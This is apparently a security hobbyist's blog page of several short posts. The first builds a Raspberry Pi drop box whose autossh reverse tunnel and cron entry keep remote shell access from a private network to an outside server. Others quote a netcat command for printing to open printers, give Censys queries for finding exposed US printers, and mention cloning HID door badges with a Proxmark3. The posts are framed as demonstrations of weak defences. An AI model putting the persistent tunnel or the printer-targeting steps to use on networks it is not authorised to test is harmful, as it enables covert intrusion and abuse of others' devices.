Category: Hacking

I have a couple of old Raspberry Pi’s 2 laying around and have been meaning to turn them into “Remote Access Terminals” to demonstrate what happens if you do not do effective egress filtering on your network. At a high level if an attacker can plug in one of these on your network and get internet access they own your network.
Here is a terrible diagram I put together using draw.io to explain:

To set this up you will need the following:

• Public SSH server (I like DigitalOcean for this.)
• RaspberryPi
• Raspian
• AutoSSH
• Screen
• Understanding of SSH Keys
• Understanding of CRON 

There are plenty of guides on setting this up so I won’t spend time doing that here. Once you have that complete and are on the pi you can run the the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean

Autossh will use ports 65500 and 65501 to send echo data over and back between server and host and open an ssh session on the public server to local port 2222 that will tunnel back to the SSH port on the Pi.
Once that is done you can ssh into your public ssh server and run the following command:
ssh -p 2222 [email protected]

Congratulations you now have a host you can control from the internet on a private network (That you totally have permission to be plugged into, right?).

While this works if the pi is has any problems the tunnel will be gone so we will use a cron job to make sure that it is always up.  You can use the following crontab entry that checks if the tunnel is up every minute:
* * * * * pi /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean
Reboot the Pi to test and you should be good to go.

I have been playing with the GL.inet hardware lately and stumbled upon this project called NetAidKit that is built on the $25 6416 platform that offers a purpose built TOR and VPN router.
After building the images using the instructions on their github page (here is the one I built if you trust me) all you have to do is upload it and reboot and you are in business:

The TOR feature worked flawlessly:

The VPN still needs a lot of work as it expects certificate based authentication and every VPN I use still uses username and password authentication so I was disappointed I didn’t get to try it out.

Over all this is an amazing project with a great idea and lots of potential.  I will be carrying a netaidkit with me from now on even if it just to use with TOR.

After spending last night working on a Reverse DNS Function for Google Sheets I couldnt leave well enough alone and wrote Shodan2Sheets tonight using the shodan.io api.

It provides a lot more information than the reverse lookup function and all you should have to do is copy your API key to C2 and then start filling in IP addresses in the A column.   You can download a copy here.

This weekend the infamous hacker and troll Weev decided it would be hilarious if he printed fascist flyers  on open printers around the united states using this top secret APT string:
cat payload.ps |netcat -q 0 ipadreess 9100
A lot of Colleges and Universities seem to have a problem with this.   While I strongly disagree with the content that Weev printed I was interested in how many printers were “vulnerable”  to this attack.
Using Censys.io (my favorite internet host search tool) to search for the following string “location.country_code:US AND telnet AND HP Jetdirect” I found 15,237 printers in the US that are “weev-able”.

While 15,237 printers on the public internet is ridculous searching for “location.country_code:US AND “HP JetDirect Password is not set”” displays 5,683 printers that have no passwords set at all.

The FBI has recently sued Apple to make them unlock the iphone of the San Bernardino Shooter (Here is Apple’s response.).
The reason Apple needs help is because the phone has “Erase All Data After 10 Failed Passcode Attempts” turned on.   Without that feature the government would have just built this robot to brute force the password and this wouldnt have been an issue:

What this means for the general public is that we now know that the FBI can not bypass this setting so if you care about your privacy you should enable it.
Doing so is fairly easy:
Settings > Touch ID & Passcodes > Erase Data > Enable.

While this is a “dangerous” setting getting the phone to actually erase the data is actually pretty hard.  You have to wait through the following timeouts so that your toddler (or a malicious jerk) will not accidently erase your phone:

 
You get used to seeing this screen a lot:

After the 10th attempt this happens:

I have been meaning to pick up a Proxmark3 for the last couple of months to round out my RFID testing kit (while waiting for the chameleon mini to be released this summer).
The problem is that most of the known suppliers are selling the Proxmark3 for around $420.  I then found that Elechouse has their internal version of the Proxmark3 V2 for only $200 ($220 with a battery to make it truly portable).
So of course I ordered and built one: 
Building it was fairly simple and Chris Merrett has an awesome github package put together to make installing it on OSX painless.
Once built and tested cloning HID Prox Cards (which open most corporate doors) is this easy:

I am really looking forward to getting this out into the wild and showing people why they shouldn’t trust their door locks at their business or in their hotel room.